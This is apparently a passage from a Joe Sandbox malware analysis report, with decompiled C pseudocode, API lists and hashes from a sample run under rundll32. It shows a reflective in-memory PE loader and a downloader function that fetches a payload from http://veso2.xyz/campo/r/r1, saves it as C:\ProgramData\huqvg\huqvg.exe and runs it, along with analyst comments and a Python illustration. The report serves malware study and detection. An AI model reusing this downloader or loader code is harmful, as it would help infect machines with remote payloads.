    				if( *((intOrPtr*)(_v32 + 4)) != 0) {
    					_v8 = _v16 +  *_v32;
    					while(IsBadReadPtr(_v8, 0x14) == 0 &&  *((intOrPtr*)(_v8 + 0xc)) != 0) {
    						_t21 = _a4 + 0x28; // 0x0
    						_t26 = _a4 + 0x1c; // 0x0, executed
    						_t114 =  *((intOrPtr*)( *_t26))(_v16 +  *((intOrPtr*)(_v8 + 0xc)),  *_t21); // executed
    						_t207 = _t206 + 8;
    						_v24 = _t114;
    						if(_v24 != 0) {
    							_t31 = _a4 + 0xc; // 0xffff
    							_t35 = _a4 + 8; // 0x4
    							_t117 = E011B1170( *_t35, 4 +  *_t31 * 4); // executed
    							_t206 = _t207 + 8;
    							_v36 = _t117;
    							if(_v36 != 0) {
    								 *((intOrPtr*)(_a4 + 8)) = _v36;
    								_t48 = _a4 + 0xc; // 0xffff
    								_t50 = _a4 + 8; // 0x4
    								 *((intOrPtr*)( *_t50 +  *_t48 * 4)) = _v24;
    								_t55 = _a4 + 0xc; // 0xffff
    								 *(_a4 + 0xc) =  *_t55 + 1;
    								if( *_v8 == 0) {
    									_v12 = _v16 +  *((intOrPtr*)(_v8 + 0x10));
    									_v20 = _v16 +  *((intOrPtr*)(_v8 + 0x10));
    								} else {
    									_v12 = _v16 +  *_v8;
    									_v20 = _v16 +  *((intOrPtr*)(_v8 + 0x10));
    								}
    								while( *_v12 != 0) {
    									if(( *_v12 & 0x80000000) == 0) {
    										_v40 = _v16 +  *_v12;
    										_t91 = _a4 + 0x28; // 0x0
    										_t95 = _a4 + 0x20; // 0x0
    										_t135 =  *((intOrPtr*)( *_t95))(_v24, _v40 + 2,  *_t91);
    										_t206 = _t206 + 0xc;
    										 *_v20 = _t135;
    									} else {
    										_t81 = _a4 + 0x28; // 0x0
    										_t85 = _a4 + 0x20; // 0x0
    										_t140 =  *((intOrPtr*)( *_t85))(_v24,  *_v12 & 0x0000ffff,  *_t81);
    										_t206 = _t206 + 0xc;
    										 *_v20 = _t140;
    									}
    									if( *_v20 != 0) {
    										_v12 =  &(_v12[1]);
    										_v20 = _v20 + 4;
    										continue;
    									} else {
    										_v28 = 0;
    										break;
    									}
    								}
    								if(_v28 != 0) {
    									_v8 = _v8 + 0x14;
    									continue;
    								}
    								_t101 = _a4 + 0x28; // 0x0
    								_t104 = _a4 + 0x24; // 0x0
    								 *((intOrPtr*)( *_t104))(_v24,  *_t101);
    								SetLastError(0x7f);
    								break;
    							}
    							_t39 = _a4 + 0x28; // 0x0
    							_t42 = _a4 + 0x24; // 0x0
    							 *((intOrPtr*)( *_t42))(_v24,  *_t39);
    							SetLastError(0xe);
    							_v28 = 0;
    							break;
    						}
    						SetLastError(0x7e);
    						_v28 = 0;
    						break;
    					}
    					return _v28;
    				}
    				return 1;
    			}

    APIs
    • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 011B191C
    • SetLastError.KERNEL32(0000007E), ref: 011B195E
    Memory Dump Source
    • Source File: 00000003.00000002.662633575.00000000011B1000.00000020.00000001.sdmp, Offset: 011B0000, based on PE: true
    • Associated: 00000003.00000002.662614711.00000000011B0000.00000004.00000001.sdmp Download File
    • Associated: 00000003.00000002.662646662.00000000011B3000.00000002.00000001.sdmp Download File
    • Associated: 00000003.00000002.662686050.00000000011B4000.00000004.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11b0000_rundll32.jbxd
    Similarity
    • API ID: ErrorLastRead
    • String ID:
    • API String ID: 4100373531-0
    • Opcode ID: 9a5ea6cd0d294b87161c47ec41afd893657fed4109b2367d2b0bc272f69e2324
    • Instruction ID: 60f8654cb165de9134ec2dc25c9a24373d6935f1f203b1637cd4eb5da750a5a7
    • Opcode Fuzzy Hash: 9a5ea6cd0d294b87161c47ec41afd893657fed4109b2367d2b0bc272f69e2324
    • Instruction Fuzzy Hash: 1781C874A00209EFDB08CF98D490BAEBBB1FF48314F258158E919AB355D774EA81CF91
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 399 116002d-116009e call 1160456 * 6 412 11600a7-11600b0 399->412 413 11600a0-11600a2 399->413 412->413 415 11600b2-11600b6 412->415 414 116044e-1160455 413->414 415->413 416 11600b8-11600c2 415->416 417 11600e4-1160105 GetNativeSystemInfo 416->417 418 11600c4-11600c7 416->418 417->413 420 1160107-116012d VirtualAlloc 417->420 419 11600c9-11600cf 418->419 421 11600d6 419->421 422 11600d1-11600d4 419->422 423 1160162-116016c 420->423 424 116012f-1160133 420->424 427 11600d9-11600e2 421->427 422->427 425 11601a4-11601b5 423->425 426 116016e-1160173 423->426 428 1160135-1160138 424->428 430 11601b7-11601d1 425->430 431 1160234-1160240 425->431 429 1160177-116018a 426->429 427->417 427->419 432 1160153-1160155 428->432 433 116013a-1160142 428->433 436 116018c-1160193 429->436 437 1160199-116019e 429->437 449 1160222-116022e 430->449 450 11601d3 430->450 438 1160246-116025d 431->438 439 11602f0-11602fa 431->439 435 1160157-116015c 432->435 433->432 434 1160144-1160147 433->434 441 116014e-1160151 434->441 442 1160149-116014c 434->442 435->428 443 116015e 435->443 436->436 444 1160195 436->444 437->429 447 11601a0 437->447 438->439 448 1160263-1160273 438->448 445 11603b2-11603c7 call 11a2690 439->445 446 1160300-1160307 439->446 441->435 442->432 442->441 443->423 444->437 472 11603c9-11603ce 445->472 451 1160309-1160312 446->451 447->425 452 11602d5-11602e6 448->452 453 1160275-1160279 448->453 449->430 457 1160230 449->457 454 11601d7-11601db 450->454 458 11603a7-11603ac 451->458 459 1160318-1160333 451->459 452->448 456 11602ec 452->456 460 116027a-1160289 453->460 463 11601dd 454->463 464 11601fb-1160204 454->464 456->439 457->431 458->445 458->451 465 1160335-1160337 459->465 466 116034d-116034f 459->466 461 1160291-116029a 460->461 462 116028b-116028f 460->462 468 11602c3-11602c7 461->468 462->461 467 116029c-11602a1 462->467 463->464 471 11601df-11601f9 463->471 480 1160207-116021c 464->480 473 1160340-1160343 465->473 474 1160339-116033e 
465->474 469 1160351-1160353 466->469 470 1160368-116036a 466->470 476 11602b4-11602b7 467->476 477 11602a3-11602b2 467->477 468->460 483 11602c9-11602d1 468->483 478 1160355-1160357 469->478 479 1160359-116035b 469->479 484 1160371-1160376 470->484 485 116036c 470->485 471->480 481 11603d0-11603d4 472->481 482 116044c 472->482 475 1160345-116034b 473->475 474->475 486 1160379-1160380 475->486 476->468 487 11602b9-11602bf 476->487 477->468 488 116036e-116036f 478->488 479->470 489 116035d-116035f 479->489 480->454 491 116021e 480->491 481->482 490 11603d6-11603e0 481->490 482->414 483->452 484->486 485->488 494 1160382 486->494 495 1160388-116039d VirtualProtect 486->495 487->468 488->486 489->486 492 1160361-1160366 489->492 490->482 493 11603e2-11603e6 490->493 491->449 492->486 493->482 496 11603e8-11603f9 493->496 494->495 495->413 497 11603a3 495->497 496->482 498 11603fb-1160400 496->498 497->458 499 1160402-116040f 498->499 499->499 500 1160411-1160415 499->500 501 1160417-1160429 500->501 502 116042d-1160433 500->502 501->498 504 116042b 501->504 502->482 503 1160435-116044b 502->503 503->482 504->482
    APIs
    • GetNativeSystemInfo.KERNELBASE(?,?,?,?,01160005), ref: 011600E9
    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,01160005), ref: 01160111
    Memory Dump Source
    • Source File: 00000003.00000002.662420469.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1160000_rundll32.jbxd
    Similarity
    • API ID: AllocInfoNativeSystemVirtual
    • String ID:
    • API String ID: 2032221330-0
    • Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
    • Instruction ID: 698c02e9ba5a5135b962b9d57740a1491340970332588f7ba8befd623b58e8d4
    • Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
    • Instruction Fuzzy Hash: 5FD1D371A083068FD728CF5DC88076AB7E8FF88319F18452DF9958B241E776E865CB91
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 507 48510b0-48510ed call 4851640 509 48510f2-485110a 507->509 510 4851124-485114b call 4851640 509->510 511 485110c-4851121 509->511 515 4851171-485119a call 4851a04 510->515 516 485114d-485116c call 4851350 Sleep call 48512b0 510->516 511->510 516->515
    C-Code - Quality: 49%
    			E048510B0(void* __eflags) {
    				signed int _v8;
    				void _v36;
    				void _v68;
    				signed char* _v72;
    				signed char* _v76;
    				char _v80;
    				char _v84;
    				signed char* _t28;
    				signed char* _t30;
    				void* _t34;
    				signed char* _t46;
    				signed int _t71;
    				void* _t72;
    				void* _t75;
    				void* _t76;
    				void* _t80;
    
    				_t80 = __eflags;
    				_v8 =  *0x4853004 ^ _t71;
    				memcpy( &_v36, "http://veso2.xyz/campo/r/r1", 7 << 2);
    				memcpy( &_v68, "C:\\ProgramData\\huqvg\\huqvg.exe", 7 << 2);
    				asm("movsw");
    				asm("movsb");
    				_t28 = E04851640(_t80,  &_v36,  &_v84, 1); // executed
    				_t75 = _t72 + 0x24;
    				_v72 = _t28;
    				_t46 = _v72;
    				_t81 = ( *_t46 & 0x000000ff) - 0x68;
    				if(( *_t46 & 0x000000ff) != 0x68) {
    					 *0x4853008(_v72);
    					 *0x4853020(1);
    					_t75 = _t75 + 8;
    				}
    				_t30 = E04851640(_t81, _v72,  &_v80, 1);
    				_t76 = _t75 + 0xc;
    				_v76 = _t30;
    				if(( *_v76 & 0x000000ff) == 0x4d) {
    					E04851350(_v76, _v80,  &_v68);
    					_t76 = _t76 + 0xc;
    					Sleep(0x3a98);
    					E048512B0();
    				}
    				 *0x4853008(_v76);
    				_t34 =  *0x4853008(_v72);
    				E04851A04();
    				return _t34;
    			}

    APIs
      • Part of subcall function 04851640: wsprintfA.USER32 ref: 0485173A
      • Part of subcall function 04851640: WSAStartup.WS2_32(00000102,?), ref: 0485174F
    • Sleep.KERNEL32(00003A98), ref: 04851166
    Strings
    • http://veso2.xyz/campo/r/r1, xrefs: 048510C7
    • C:\ProgramData\huqvg\huqvg.exe, xrefs: 048510D6
    Memory Dump Source
    • Source File: 00000003.00000002.665004317.0000000004851000.00000020.00000001.sdmp, Offset: 04850000, based on PE: true
    • Associated: 00000003.00000002.664819390.0000000004850000.00000004.00000001.sdmp Download File
    • Associated: 00000003.00000002.666866498.0000000004852000.00000002.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4850000_rundll32.jbxd
    Similarity
    • API ID: SleepStartupwsprintf
    • String ID: C:\ProgramData\huqvg\huqvg.exe$http://veso2.xyz/campo/r/r1
    • API String ID: 1691369139-3004619249
    • Opcode ID: bf388f5049971250ffce3d3b65ffffd6f77e49ffecd0e8f688ebe6c266d487bc
    • Instruction ID: c7cb1bcf4c4d8790c7a622474b088f577ee39001a01e1241af0f0d9b85ead81e
    • Opcode Fuzzy Hash: bf388f5049971250ffce3d3b65ffffd6f77e49ffecd0e8f688ebe6c266d487bc
    • Instruction Fuzzy Hash: 8D21C771E002049BDF04EBE8D845ADFBBB9EF44304F140568E905EB241DA79BD15CB91
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 525 4851040-4851092 CreateDirectoryA 526 4851094-4851096 525->526 527 4851098 525->527 528 485109a-48510a7 call 4851a04 526->528 527->528
    C-Code - Quality: 100%
    			// Stack-string construction: each store below writes only the 4 bytes shown
    			// in its hex comment (the decompiler prints the whole literal, which is
    			// misleading); the six dwords spell "C:\ProgramData\huqvg" plus a NUL.
    			E04851040() {
    				signed int _v8;
    				char _v12;
    				intOrPtr _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _t12;
    				char _t13;
    				int _t15;
    				void* _t16;
    				char _t17;
    				intOrPtr _t18;
    				char _t21;
    				char _t22;
    				signed int _t23;
    
    				_v8 =  *0x4853004 ^ _t23;                         // stack cookie (__security_cookie ^ frame)
    				_t12 = "C:\\ProgramData\\huqvg"; // 0x505c3a43    -> "C:\P"
    				_v32 = _t12;
    				_t17 = "rogramData\\huqvg"; // 0x72676f72         -> "rogr"
    				_v28 = _t17;
    				_t21 = "amData\\huqvg"; // 0x61446d61             -> "amDa"
    				_v24 = _t21;
    				_t13 = "ta\\huqvg"; // 0x685c6174                 -> "ta\h"
    				_v20 = _t13;
    				_t18 =  *0x4852110; // 0x67767175                 -> "uqvg"
    				_v16 = _t18;
    				_t22 =  *0x4852114; // 0x0                        -> terminating NUL
    				_v12 = _t22;
    				_t15 = CreateDirectoryA( &_v32, 0); // executed   creates C:\ProgramData\huqvg, the directory huqvg.exe is later started from (E048512B0)
    				if(_t15 == 0) {
    					_t16 = 0;
    				} else {
    					_t16 = 1;
    				}
    				E04851A04();                                      // cookie check on return (call pattern of __security_check_cookie)
    				return _t16;
    			}

    APIs
    • CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?,?,?,048512A3), ref: 0485108A
    Memory Dump Source
    • Source File: 00000003.00000002.665004317.0000000004851000.00000020.00000001.sdmp, Offset: 04850000, based on PE: true
    • Associated: 00000003.00000002.664819390.0000000004850000.00000004.00000001.sdmp
    • Associated: 00000003.00000002.666866498.0000000004852000.00000002.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4850000_rundll32.jbxd
    Similarity
    • API ID: CreateDirectory
    • String ID: C:\ProgramData\huqvg
    • API String ID: 4241100979-3793086718
    • Opcode ID: 65b275c4da335384316a47013434867cc923b1f702c6a625e2a96d6f272ab1d9
    • Instruction ID: 6803149813c8c04248061d1367b01acbc1052264027a175a7ea4f2ad14ca74ee
    • Opcode Fuzzy Hash: 65b275c4da335384316a47013434867cc923b1f702c6a625e2a96d6f272ab1d9
    • Instruction Fuzzy Hash: CF011974E443489FCB04EFA8E5816AEBBF8FB19200B404999D905D3340DA386E04CF51
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph (interactive graph not reproduced): blocks 11b1460-11b15ad; VirtualFree at 11b14c2, VirtualProtect at 11b1582.
    C-Code - Quality: 100%
    			// Consistent with the FinalizeSection routine of the open-source MemoryModule
    			// reflective loader: _a8 points at the loader's per-section record
    			// {address, alignedAddress, size, characteristics, last}; _a4 is the module
    			// record (NT headers pointer at *_a4, page size at +0x30). Field roles are
    			// analyst inferences from the constants and offsets used below.
    			E011B1460(intOrPtr __ecx, intOrPtr* _a4, void** _a8) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				intOrPtr _v36;
    				long _v40;
    				int _t74;
    
    				_v36 = __ecx;
    				if(_a8[2] != 0) {                                      // section has a size
    					if((_a8[3] & 0x02000000) == 0) {                   // not IMAGE_SCN_MEM_DISCARDABLE
    						if((_a8[3] & 0x20000000) == 0) {               // IMAGE_SCN_MEM_EXECUTE
    							_v12 = 0;
    						} else {
    							_v12 = 1;
    						}
    						_v24 = _v12;
    						if((_a8[3] & 0x40000000) == 0) {               // IMAGE_SCN_MEM_READ
    							_v16 = 0;
    						} else {
    							_v16 = 1;
    						}
    						_v28 = _v16;
    						if((_a8[3] & 0x80000000) == 0) {               // IMAGE_SCN_MEM_WRITE
    							_v20 = 0;
    						} else {
    							_v20 = 1;
    						}
    						_v32 = _v20;
    						_t48 = _v28 * 8; // 0x2367118
    						// 2x2x2 table of PAGE_* constants at 0x11b5a00, indexed [execute][read][write]
    						_v8 =  *((intOrPtr*)((_v24 << 4) + _t48 + 0x11b5a00 + _v32 * 4));
    						if((_a8[3] & 0x04000000) != 0) {               // IMAGE_SCN_MEM_NOT_CACHED
    							_v8 = _v8 | 0x00000200;                    // PAGE_NOCACHE
    						}
    						_t74 = VirtualProtect( *_a8, _a8[2], _v8,  &_v40); // executed
    						if(_t74 != 0) {
    							return 1;
    						} else {
    							return 0;
    						}
    					}
    					if( *_a8 != _a8[1]) {                              // starts mid-page: shares the page with the previous section, keep it
    						L8:
    						return 1;
    					}
    					if(_a8[4] != 0) {                                  // last section
    						L7:
    						VirtualFree( *_a8, _a8[2], 0x4000); // executed   MEM_DECOMMIT
    						goto L8;
    					}
    					_t14 = _a4 + 0x30; // 0x0
    					// OptionalHeader.SectionAlignment (NT headers + 0x38) == page size, or size is a page multiple
    					if( *((intOrPtr*)( *_a4 + 0x38)) ==  *_t14 || _a8[2] %  *(_a4 + 0x30) == 0) {
    						goto L7;
    					} else {
    						goto L8;
    					}
    				}
    				return 1;
    			}
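
    The routine above reduces a section's Characteristics to one VirtualProtect constant through a 2x2x2 lookup, and separately decides whether a DISCARDABLE section can be decommitted. The following is an added example written for this report, not code from the sample or from the MemoryModule project: it parses a constructed three-section IMAGE_SECTION_HEADER table (not bytes from 4123.dll) and applies the same two decisions. The contents of the table at 0x11b5a00 are not dumped on this page; PROTECTION_FLAGS below uses the standard MemoryModule values for it, which is an assumption.

```python
import struct

# IMAGE_SECTION_HEADER is 0x28 bytes (the stride used by E011B12A0); Characteristics is its last dword
SECTION_HEADER_FMT = "<8s6I2HI"
SECTION_HEADER_SIZE = struct.calcsize(SECTION_HEADER_FMT)   # 40

IMAGE_SCN_MEM_DISCARDABLE = 0x02000000
IMAGE_SCN_MEM_NOT_CACHED  = 0x04000000
IMAGE_SCN_MEM_EXECUTE     = 0x20000000
IMAGE_SCN_MEM_READ        = 0x40000000
IMAGE_SCN_MEM_WRITE       = 0x80000000

PAGE_NOACCESS, PAGE_READONLY, PAGE_READWRITE, PAGE_WRITECOPY = 0x01, 0x02, 0x04, 0x08
PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY = 0x10, 0x20, 0x40, 0x80
PAGE_NOCACHE = 0x200

# ASSUMPTION: the table at 0x11b5a00 is not dumped on this page. These are the values of
# the standard MemoryModule ProtectionFlags table, indexed [executable][readable][writeable]
# exactly as the decompiled index arithmetic ((x << 4) + r * 8 + w * 4) does.
PROTECTION_FLAGS = [
    [[PAGE_NOACCESS, PAGE_WRITECOPY], [PAGE_READONLY, PAGE_READWRITE]],
    [[PAGE_EXECUTE, PAGE_EXECUTE_WRITECOPY], [PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE]],
]


def section_protection(characteristics):
    """VirtualProtect constant the loader derives from a section's Characteristics."""
    x = 1 if characteristics & IMAGE_SCN_MEM_EXECUTE else 0
    r = 1 if characteristics & IMAGE_SCN_MEM_READ else 0
    w = 1 if characteristics & IMAGE_SCN_MEM_WRITE else 0
    prot = PROTECTION_FLAGS[x][r][w]
    if characteristics & IMAGE_SCN_MEM_NOT_CACHED:
        prot |= PAGE_NOCACHE
    return prot


def should_decommit(characteristics, address, aligned_address, size, last,
                    section_alignment, page_size):
    """The DISCARDABLE branch: release the pages only when no neighbouring section shares them."""
    if not characteristics & IMAGE_SCN_MEM_DISCARDABLE:
        return False
    if address != aligned_address:
        return False            # starts mid-page, so the previous section lives there too
    return bool(last) or section_alignment == page_size or size % page_size == 0


def parse_section_headers(blob, count):
    headers = []
    for i in range(count):
        f = struct.unpack_from(SECTION_HEADER_FMT, blob, i * SECTION_HEADER_SIZE)
        headers.append({"name": f[0].rstrip(b"\0").decode("ascii"),
                        "virtual_address": f[2], "size_of_raw_data": f[3],
                        "characteristics": f[9]})
    return headers


def finalize_plan(blob, count, image_base=0x11B0000, section_alignment=0x1000, page_size=0x1000):
    """Per section: ('decommit', None) or ('protect', PAGE_* value), as FinalizeSection would decide."""
    plan = []
    headers = parse_section_headers(blob, count)
    for i, h in enumerate(headers):
        addr = image_base + h["virtual_address"]
        aligned = addr & ~(page_size - 1)
        last = i == len(headers) - 1
        if should_decommit(h["characteristics"], addr, aligned, h["size_of_raw_data"],
                           last, section_alignment, page_size):
            plan.append((h["name"], "decommit", None))
        else:
            plan.append((h["name"], "protect", section_protection(h["characteristics"])))
    return plan


def sample_section_table():
    """Constructed three-section table for the example; not taken from the sample."""
    def hdr(name, vsize, va, raw, chars):
        return struct.pack(SECTION_HEADER_FMT, name.ljust(8, "\0").encode(),
                           vsize, va, raw, 0x400, 0, 0, 0, 0, chars)
    return (hdr(".text", 0x1000, 0x1000, 0x1000, 0x60000020)    # CODE | EXECUTE | READ
            + hdr(".data", 0x200, 0x2000, 0x200, 0xC0000040)    # INITIALIZED_DATA | READ | WRITE
            + hdr(".reloc", 0x100, 0x3000, 0x100, 0x42000040))  # INITIALIZED_DATA | DISCARDABLE | READ
```

    Running finalize_plan on the constructed table gives PAGE_EXECUTE_READ for .text, PAGE_READWRITE for .data and a decommit for .reloc, which is why a memory dump of such a loader's image shows the discardable relocation section missing while code pages are executable but not writable.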

    APIs
    • VirtualFree.KERNELBASE(?,00000000,00004000,?,?,?,?,011B1718,011B4000,?,011B4000,00000000), ref: 011B14D4
    Memory Dump Source
    • Source File: 00000003.00000002.662633575.00000000011B1000.00000020.00000001.sdmp, Offset: 011B0000, based on PE: true
    • Associated: 00000003.00000002.662614711.00000000011B0000.00000004.00000001.sdmp
    • Associated: 00000003.00000002.662646662.00000000011B3000.00000002.00000001.sdmp
    • Associated: 00000003.00000002.662686050.00000000011B4000.00000004.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11b0000_rundll32.jbxd
    Similarity
    • API ID: FreeVirtual
    • String ID:
    • API String ID: 1263568516-0
    • Opcode ID: 29690a2f6783a37834d35bfa42268a8fb08ac511f6875dc0146937865ac7924b
    • Instruction ID: 9b641ea556f4da83bbef9cf42aad9d75ae7401fc32d1075d0ea037e45d856bb6
    • Opcode Fuzzy Hash: 29690a2f6783a37834d35bfa42268a8fb08ac511f6875dc0146937865ac7924b
    • Instruction Fuzzy Hash: A141C675A10209AFDB18CF48D4E4BEAB7B2FB88314F15C159E81A5B355C775EA81CB80
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph (interactive graph not reproduced): blocks 11b12a0-11b13ee; VirtualAlloc at 11b130c and 11b1384; calls to 11b1270, 11b1080 and 11b10d0.
    C-Code - Quality: 100%
    			// Consistent with MemoryModule's CopySections: maps each section of the
    			// embedded PE. _a4 = raw file data, _a8 = its size, _a12 = NT headers in the
    			// raw file, _a16 = module record (copied NT headers at *_a16, image base at +4).
    			// Offsets are the standard PE field offsets; the helper roles are inferred.
    			E011B12A0(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
    				intOrPtr _v8;
    				void* _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				long _v24;
    				intOrPtr _v28;
    				void* _t76;
    				void* _t127;
    
    				_v28 = __ecx;
    				_t3 = _a16 + 4; // 0xf5e9
    				_v16 =  *_t3;                                                    // mapped image base
    				_t7 =  *_a16 + 0x14; // 0x508bf84d                                // FileHeader.SizeOfOptionalHeader
    				_t9 = ( *_t7 & 0x0000ffff) + 0x18; // 0x11b1e76
    				_v8 =  *_a16 + _t9;                                              // first IMAGE_SECTION_HEADER
    				_v20 = 0;
    				while(1) {
    					_t17 =  *_a16 + 6; // 0xe9000000                              // FileHeader.NumberOfSections
    					if(_v20 >= ( *_t17 & 0x0000ffff)) {
    						break;
    					}
    					if( *(_v8 + 0x10) != 0) {                                     // SizeOfRawData != 0
    						// E011B1270: bounds check that PointerToRawData + SizeOfRawData fits in the input buffer (inferred)
    						if(E011B1270(_v28, _a8,  *((intOrPtr*)(_v8 + 0x14)) +  *(_v8 + 0x10)) != 0) {
    							// VirtualAlloc(base + VirtualAddress, SizeOfRawData, MEM_COMMIT, PAGE_READWRITE)
    							_t76 = VirtualAlloc(_v16 +  *((intOrPtr*)(_v8 + 0xc)),  *(_v8 + 0x10), 0x1000, 4); // executed
    							_v12 = _t76;
    							if(_v12 != 0) {
    								_v12 = _v16 +  *((intOrPtr*)(_v8 + 0xc));
    								E011B10D0(_v12, _a4 +  *((intOrPtr*)(_v8 + 0x14)),  *(_v8 + 0x10));   // memcpy-like: raw section bytes -> mapped address
    								_t127 = _t127 + 0xc;
    								 *((intOrPtr*)(_v8 + 8)) = _v12;                         // mapped address stashed in Misc.PhysicalAddress
    								L1:
    								_v20 = _v20 + 1;
    								_v8 = _v8 + 0x28;                                        // sizeof(IMAGE_SECTION_HEADER)
    								continue;
    							}
    							return 0;
    						}
    						return 0;
    					}
    					_v24 =  *((intOrPtr*)(_a12 + 0x38));                             // OptionalHeader.SectionAlignment: size used for a section with no raw data (.bss)
    					if(_v24 <= 0) {
    						L8:
    						goto L1;
    					}
    					_v12 = VirtualAlloc(_v16 +  *((intOrPtr*)(_v8 + 0xc)), _v24, 0x1000, 4);
    					if(_v12 != 0) {
    						_v12 = _v16 +  *((intOrPtr*)(_v8 + 0xc));
    						 *((intOrPtr*)(_v8 + 8)) = _v12;
    						E011B1080(_v12, 0, _v24);                                    // memset-like: zero-fill
    						_t127 = _t127 + 0xc;
    						goto L8;
    					}
    					return 0;
    				}
    				return 1;
    			}

    APIs
    • VirtualAlloc.KERNEL32(?,00000000,00001000,00000004), ref: 011B1321
    • VirtualAlloc.KERNELBASE(?,?,00001000,00000004,00000000,?,?,011B1E5E), ref: 011B139C
    Memory Dump Source
    • Source File: 00000003.00000002.662633575.00000000011B1000.00000020.00000001.sdmp, Offset: 011B0000, based on PE: true
    • Associated: 00000003.00000002.662614711.00000000011B0000.00000004.00000001.sdmp
    • Associated: 00000003.00000002.662646662.00000000011B3000.00000002.00000001.sdmp
    • Associated: 00000003.00000002.662686050.00000000011B4000.00000004.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11b0000_rundll32.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: 28c10e09472410354f1c5860107c1bb7ad875c6b55124b1133804efb258c604e
    • Instruction ID: b104c0b7af9c6dd123f0819220d01eb4938e9eee746e3257a2a097b75d44b8bd
    • Opcode Fuzzy Hash: 28c10e09472410354f1c5860107c1bb7ad875c6b55124b1133804efb258c604e
    • Instruction Fuzzy Hash: 6951C575A04209EFCB08CF98D5D0AAEB7B1FF48314F218598E905AB355D370EE91CB95
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph (interactive graph not reproduced): blocks 11b190d-11b1ae9; IsBadReadPtr in the entry block, SetLastError at 11b195c, 11b1996 and 11b1abe; calls to 11b1af0 and 11b1170.
    C-Code - Quality: 37%
    			// Consistent with MemoryModule's BuildImportTable. Frame-relative locals (ebp = _t179):
    			//   [ebp-4]    current IMAGE_IMPORT_DESCRIPTOR (0x14 bytes each)
    			//   [ebp-0xc]  mapped image base
    			//   [ebp+8]    module record: +8 handle array, +0xc handle count, callbacks at
    			//              +0x1c loadLibrary, +0x20 getProcAddress, +0x24 freeLibrary, +0x28 userdata
    			//   [ebp-0x14] handle of the DLL being imported; [ebp-0x20] grown handle array
    			//   [ebp-8]    thunk being read (INT, or the IAT itself when OriginalFirstThunk == 0)
    			//   [ebp-0x10] IAT slot being written; [ebp-0x18] result flag
    			// Field roles are analyst inferences from the offsets and the error codes set.
    			E011B190D() {
    				intOrPtr _t95;
    				intOrPtr _t99;
    				intOrPtr _t102;
    				intOrPtr _t118;
    				intOrPtr _t123;
    				void* _t179;
    				void* _t181;
    				void* _t183;
    				void* _t184;
    
    				L0:
    				while(1) {
    					L0:
    					 *(_t179 - 4) =  *(_t179 - 4) + 0x14;                                       // next descriptor
    					// stop at an unreadable descriptor or at the terminator (Name == 0)
    					if(IsBadReadPtr( *(_t179 - 4), 0x14) != 0 ||  *((intOrPtr*)( *(_t179 - 4) + 0xc)) == 0) {
    						break;
    					}
    					L3:
    					_t7 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
    					_t12 =  *((intOrPtr*)(_t179 + 8)) + 0x1c; // 0x0, executed
    					// loadLibrary callback (E011B1AF0, a LoadLibraryA wrapper): (base + desc->Name, userdata)
    					_t99 =  *((intOrPtr*)( *_t12))( *((intOrPtr*)(_t179 - 0xc)) +  *((intOrPtr*)( *(_t179 - 4) + 0xc)),  *_t7); // executed
    					_t183 = _t181 + 8;
    					 *((intOrPtr*)(_t179 - 0x14)) = _t99;
    					if( *((intOrPtr*)(_t179 - 0x14)) != 0) {
    						L5:
    						_t17 =  *((intOrPtr*)(_t179 + 8)) + 0xc; // 0xffff
    						_t21 =  *((intOrPtr*)(_t179 + 8)) + 8; // 0x4
    						_t102 = E011B1170( *_t21, 4 +  *_t17 * 4); // executed                // realloc-like: grow the handle array by one pointer
    						_t184 = _t183 + 8;
    						 *((intOrPtr*)(_t179 - 0x20)) = _t102;
    						if( *((intOrPtr*)(_t179 - 0x20)) != 0) {
    							L7:
    							 *((intOrPtr*)( *((intOrPtr*)(_t179 + 8)) + 8)) =  *((intOrPtr*)(_t179 - 0x20));
    							_t34 =  *((intOrPtr*)(_t179 + 8)) + 0xc; // 0xffff
    							_t36 =  *((intOrPtr*)(_t179 + 8)) + 8; // 0x4
    							 *((intOrPtr*)( *_t36 +  *_t34 * 4)) =  *((intOrPtr*)(_t179 - 0x14));  // modules[count] = handle
    							_t41 =  *((intOrPtr*)(_t179 + 8)) + 0xc; // 0xffff
    							 *( *((intOrPtr*)(_t179 + 8)) + 0xc) =  *_t41 + 1;                       // count++
    							if( *( *(_t179 - 4)) == 0) {                                             // OriginalFirstThunk == 0: walk the IAT for names too
    								 *(_t179 - 8) =  *((intOrPtr*)(_t179 - 0xc)) +  *((intOrPtr*)( *(_t179 - 4) + 0x10));
